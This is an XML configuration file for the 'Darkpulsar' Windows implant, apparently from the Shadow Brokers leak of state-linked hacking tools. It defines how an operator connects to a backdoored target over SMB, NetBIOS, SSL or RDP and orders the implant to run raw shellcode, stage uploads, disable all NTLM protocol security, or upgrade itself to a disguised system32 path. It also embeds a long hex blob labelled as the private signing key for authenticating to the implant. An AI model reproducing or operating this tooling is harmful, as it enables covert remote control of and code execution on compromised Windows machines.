shadowbrokers-exploits/windows/implants/Darkpulsar-1.1.0.9.xml
2017-04-14 11:45:07 +02:00


<?xml version='1.0' encoding='utf-8'?>
<config xmlns='urn:trch' name='Darkpulsar' version='1.1.0' schemaversion='2.1.0' configversion='1.1.0.0' id='10c67c6f8ff73eb12e2f96318b878835e3513aae'>
<inputparameters>
<parameter type='S16' name='NetworkTimeout' description='Timeout for blocking network calls (in seconds). Use -1 for no timeout.'>
<default>60</default>
</parameter>
<parameter xdevmap='TARGET_IP_V4_ADDRESS' type='IPv4' name='TargetIp' description='Target IP Address'/>
<parameter xdevmap='TARGET_PORT' type='TcpPort' name='TargetPort' description='Port used by the remote service'/>
<parameter name='SspMTU' required='false' xdevmap='SSP_MTU_SIZE' hidden='true' type='S32' description='Data fragmentation size'/>
<paramchoice name='Architecture' description='Architecture Type'>
<default>x86</default>
<paramgroup name='x86' description='x86 Architecture'/>
<paramgroup name='x64' description='x64 Architecture'/>
</paramchoice>
<parameter xdevmap='FRAGMENT_SIZE' type='U32' name='SSPFragmentSize' description='Fragment size (leave as default except when performing EDFStagedUpload against a Vista/2k8 target. Against these targets, 480 or lower is appropriate)'>
<default>0</default>
</parameter>
<paramchoice name='Protocol' description='The remote target protocol'>
<default>SMB</default>
<paramgroup name='SMB' description='Microsoft Server Message Block (SMB) over TCP (445)'>
<parameter type='Boolean' name='UseNTLMSSPHeader' description='Suppress network signatures on NTLM authentication blobs by prepending a valid header. Set to False if talking to a version 1.0 implant.'>
<default>True</default>
</parameter>
</paramgroup>
<paramgroup name='NBT' description='SMB over NetBIOS (normally port 139)'>
<parameter type='Boolean' name='UseNTLMSSPHeader' description='Suppress network signatures on NTLM authentication blobs by prepending a valid header. Set to False if talking to a version 1.0 implant.'>
<default>True</default>
</parameter>
</paramgroup>
<paramgroup name='SSL' description='Secure Socket Layer (SSL) - Microsoft IIS'/>
<paramgroup name='RDP' description='Microsoft Remote Desktop Protocol'/>
</paramchoice>
<paramchoice name='ImplantAction' description='The remote operation to perform'>
<default/>
<paramgroup name='Burn' description='Burn / Uninstall DARKPULSAR'/>
<paramgroup name='RawShellcode' description='Execute Raw Shellcode'>
<parameter type='Buffer' name='Shellcode' description='Blob of shellcode to execute'/>
</paramgroup>
<paramgroup name='EDFStagedUpload' description='Execute EDF Staged Upload'/>
<paramgroup name='DisableSecurity' description='Disables all NTLM protocol security'/>
<paramgroup name='EnableSecurity' description='Re-enables NTLM protocol security'/>
<paramgroup name='UpgradeImplant' description='Upgrades DAPU'>
<parameter type='LocalFile' name='NewFile' description='Path to the new implant file'/>
<parameter type='String' name='WritePath' description='Path to write the new file on the remote system'>
<default>c:\windows\system32\sipauth32.tsp</default>
</parameter>
</paramgroup>
<paramgroup name='PingPong' description='Test plugin communications'>
<parameter type='U32' name='PingPongBufferSize' description='Buffer size to test communications'>
<default>100</default>
</parameter>
</paramgroup>
</paramchoice>
<paramchoice name='PrivateKeyInputType' description='How the private signing key is supplied'>
<default>XML</default>
<paramgroup name='XML' description='Private key is specified in the XML file'>
<parameter xdevmap='DUMBPULSAR_SIG_PRIVATE_KEY' hidden='true' type='Buffer' name='SigPrivateKey' description='Blob containing private key for signing'>
<default>\x07\x02\x00\x00\x00\xa4\x00\x00\x52\x53\x41\x32\x00\x08\x00\x00\x01\x00\x01\x00\xc1\x59\x98\x68\xe3\x16\x5b\x33\x88\x18\xf5\xdb\x5c\xf4\x62\x1c\xcb\x1b\x9d\xb8\xa1\x20\x79\x99\xde\xe7\x61\x56\x55\x77\xce\x5b\x86\x76\x95\xa3\xc6\x0c\xf0\xad\x96\x8e\x6d\x84\xca\x17\xa5\x93\xb2\x58\x74\x7e\x10\x87\x72\x6b\x88\x13\x2c\x77\x54\xa2\x25\x2e\x93\xee\x84\x83\x33\x87\x1a\xa2\xa8\x58\x0e\xac\xaa\xa0\x43\x16\xfe\x1e\x47\x96\x85\xa3\x6d\x72\x38\x44\xf0\xd0\x72\x6b\xbf\xc8\x6d\x00\x30\xc5\x8b\xcd\xb2\x34\x21\xac\x74\xd1\x11\xc2\xc8\xcd\x68\x80\x2b\xa3\xd4\xca\xe1\x58\xd3\x8f\x9e\x44\x51\x53\x4a\x5d\xcd\x10\x1e\x3f\x85\xe6\x7b\x7b\x54\xae\x80\x15\xea\x44\x4e\x13\xde\x4f\x24\xbc\xd5\xe7\x72\x1f\x49\x9c\x71\x86\xb1\x1b\x5e\x8f\x3d\xb1\xe6\x93\x6d\xe8\xbc\xf0\x19\x9e\x42\x01\x1e\x3b\x1a\x81\x3c\xbc\x1d\x6a\x9c\x3f\x18\x31\x9a\x8f\xc7\xf1\x71\x94\xa6\x1d\xbe\xad\xc7\x52\x1a\x22\xdd\x92\xf2\x2e\x8d\x39\x0a\xb0\xef\x2e\xbe\x76\xea\xd8\x7e\x05\x1b\x3e\xd5\x07\x00\xc1\x3f\xec\x2d\xc5\x33\x97\x4f\x1e\x58\xb2\x9c\x29\xf9\xde\xfe\x97\xc9\x05\x2f\xab\xf3\x13\x53\xe4\xde\x2a\xdc\xa7\xc5\xfe\xbe\xc2\x87\x8f\x89\xda\xd3\x8f\xe8\xf0\xd2\x80\x5d\xc4\xad\x8c\xd5\xed\xe1\x1a\xc0\xcd\x6d\x81\x23\xf1\x8e\xd8\xca\xdf\xd9\xbc\xfe\xdc\x08\x42\x30\x87\x3e\x73\xe5\x45\x74\xa3\x2e\xed\x44\xa0\xe7\x3e\xd2\x96\xb5\x30\x0d\x20\xd8\x8e\x0b\x9d\x61\xc2\x1d\x9a\x72\x5a\x5c\xfa\x17\x4d\xb9\x48\xa3\x49\xc0\xa6\xc2\x17\xd8\x0c\x1e\xb2\xc1\x85\xac\xf7\x42\x69\xe5\xaa\x88\x89\x01\x4a\x19\x45\xe5\xac\x81\x8d\x89\xb8\xea\x32\x21\xe4\x47\xf1\xf5\x00\x38\x1a\x57\x62\xef\x33\xae\x25\x5b\xfa\x56\x43\x6d\xae\xfb\x64\x8a\xa5\x1b\xa1\xd3\xd3\xe5\xfb\x9b\x87\xab\x12\x24\x59\xd1\x28\x80\xee\xf0\xba\xb9\x76\xf4\x5a\xae\x13\x25\xa2\xf9\xc6\x2c\x2a\x9c\xe9\xa8\x78\xa3\x57\x7e\x83\xfb\xe1\xb9\xbf\x1e\x9b\x08\x04\xf9\x41\xf5\x5b\x4a\xf9\x8b\x23\x49\xb3\x43\x3b\x34\xeb\x5b\x14\x1c\x49\xe7\x6f\x39\xd1\x34\x12\xa3\xa9\xef\x2b\x10\xa4\x99\x12\xa0\x04\x36\xae\x32\xd4\x14\xb0\xc2\xb3\x56\xb8\xc5\x33\x72\x95\xaf\x35\x50\x4d\x84\x7
d\x9b\xce\x53\x45\x7a\x32\x7c\x3b\x6b\x07\x3d\xbb\x45\x51\x3e\xe4\x0a\xbc\x12\x29\x59\x20\x48\xf6\xbd\xea\xdc\x0a\x61\x50\xf7\xa6\x18\xde\xb1\x6f\x92\xb9\x68\x2a\x1c\xb6\xab\x4f\xf0\x2e\xa3\xd9\xf1\x08\x6b\x77\x37\x98\x99\x5d\x5d\x07\x9f\xd3\xe1\xbc\xf3\x8d\xee\x3a\x80\xba\x59\x8e\x70\x0c\x57\xd1\xeb\x35\x4a\x68\xeb\xe8\xf6\xa3\xcb\x6b\xc3\x85\xe3\xc3\xcf\xae\xa7\xf7\xf5\x43\x5f\x9f\xb8\x85\x1e\xac\xa9\x7b\xac\xe9\xfe\x3c\xfb\x7c\x93\xad\x64\xe9\x0a\x01\xa0\x13\x19\xa4\xec\x2c\xef\x2a\x15\x6d\x92\x59\x9f\x72\x9e\x95\x10\xbd\x96\xfe\xac\x56\xed\x8e\x33\x17\xee\xbe\x66\xef\x66\xd4\x95\xf4\x68\xdc\x62\x5d\xa5\x27\xa2\xdd\x45\x82\xd4\xca\x56\xe6\x15\x43\xd7\x32\xd1\xbd\xa9\xb8\xdf\xc2\x2c\x09\xf4\x5c\xcb\x04\x10\xce\x3e\xd7\xf8\x83\x7a\xf6\xce\x7b\x8f\x6d\xb1\x66\xa8\xf7\x02\xf0\xf9\x5c\xe5\x70\x1e\x77\xd2\xd4\xd0\xfe\x74\x57\x8d\x25\xc4\x5d\x16\x93\x05\x23\x50\x8d\x60\xb7\x43\xd3\x04\xb9\xab\xa8\xda\xce\x7b\x5c\x1f\xf0\x27\xa2\xa7\x46\x42\xb5\xfb\x8b\x43\x7e\xde\xc6\xa4\x04\x5f\x1d\xc6\x4e\x00\x51\x4f\xf3\x76\xdf\xcf\x29\xf6\xef\x51\x44\x8e\x03\x01\x18\x6a\x8c\x56\x9b\x80\xc2\xf0\x3d\x1c\xf4\x8c\x79\x0d\xab\xe1\x61\xb6\x24\xfd\x19\xa4\xd0\xae\xd1\x38\x1b\x11\xec\xde\xc4\x6e\x50\xbf\x3a\x5f\x52\x19\xc9\xb2\xa2\x3d\x92\xbe\xc6\x6a\x5e\x3e\x07\x91\xd3\xe4\xb9\xa4\x7d\x3a\x45\x11\x50\xba\x0c\xb8\xaa\xcc\xc6\xce\x9e\x9f\x48\xec\x10\x34\x8b\x4c\xfb\x67\x00\x13\x2b\xdf\x80\x22\xc3\xbb\xd4\xfb\x53\x09\x3c\x17\x7d\x78\xd8\x9c\x78\x11\x9a\xa4\x99\x3e\x3e\x33\x68\xa4\xea\x77\x11\x44\x64\x00\xe4\x8a\x1c\x1d\x2e\xe4\xe1\xcb\x5a\xe9\x60\x10\xfe\x13\x5b\x07\x88\xa9\x29\x75\x5d\x9b\x92\x65\x03\x67\x2c\x20\xef\xce\x13\x08\x66\x42\xee\xf2\x87\xff\xf6\xef\xab\xeb\xb6\x3d\x81\x4e\x60\xd8\x92\xf5\x4b\x65\xdb\x64\x0b\xd6\x92\x14\xa0\x7b\x84\x43\xd9\x8d\x94\xfb\xb2\xab\xc9\x6b\x93\xbc\xca\x6c\x71\xe1\x82\x91\xc4\x25\xe5\xde\xb1\x42\x8d\xd1\x82\x59\x6f\xc2\xe1\xd7\x7a\x89\x40\x4d\xb7\xc9\xfe\x0a\xf5\x41\x2b\xf9\xca\xb3\xb0\x7d\x7c\x12\x07\x04\x14\xdb\xdc\xba\x73\x42\x3d\xb5\xd5\xe2\x21\xea\xb
8\xa3\x54\xc7\xe8\x59\xb1\x4f\x67\xf7\x9b\xaf\x12\x94\x62\x8b\x65\xb4\x78\x53\x7f\x87\xaf\x73\x00\xdd\x97\x04\x8c\x01\xd2\x60\xc9\x1b\x7a\xc3\x81\x50\x89\x4a\xeb\x66\xf8\xb6\x64\x23\x19\x7e\x1a\xa7\x64\x1b\xf8\x52\x04\xcf\xbe\x13\x91\x91\xd1\x43\x93\x63\x5b\x51\xcc\x0c\x3c\x1f\x6a\x4f\xd1\xaa\x93\x1c\x2a\x3f\x5f\x65\xdf\x04\x6d\x75\xb8\x00\xc9\xc6\x71\xdf\x45\x7c\xe5\x93\x13\x97\x34\x2b\x11\x9a\xc3\x10\x47\x79\x60\x07\xcb\xcd\x4e\x6d\x98\x09\xcb\x92\xe2\x59\x55\x65\xd9\xae\xa8\x90\x97\x86\x98\x34\x77\xec\x1f\x77\x6f\x1e\xc5\x63\xe0\xcc\x48\x20\x4e\x0b\x2b\xf8\xb8\x67\x2f\x00\x70\xb9\x71\x40\x65\x56\x7a\xc8\x3c\x93\x6f\x90\x93\x07\xba\xe1\xd6\x8b\x81\x45\x00\xbe\x6d\x91\x35\xd2\x34\x8b\x6d</default>
</parameter>
</paramgroup>
<paramgroup name='File' description='Private key is read from a local binary file'>
<parameter type='LocalFile' name='PrivateKeyFile' description='File containing private key for signing'/>
</paramgroup>
</paramchoice>
</inputparameters>
<outputparameters>
<paramchoice name='Contract' description='The contract fulfilled by this plugin'>
<paramgroup name='StagedUpload' description=''>
<parameter type='Socket' name='ConnectedTcp' description='The connected socket'/>
<parameter type='U8' name='XorMask' description='Masking byte'/>
</paramgroup>
</paramchoice>
</outputparameters>
<redirection>
<local protocol='TCP' listenaddr='TargetIp' listenport='TargetPort' closeoncompletion='false' destaddr='TargetIp' destport='TargetPort'/>
</redirection>
<logic>
<service name='dapu'>
<bindtopath path="//service[name='dapu']/port" name='TargetPort'/>
</service>
<bindtopath path='//identifier' name='TargetIp'/>
</logic>
</config>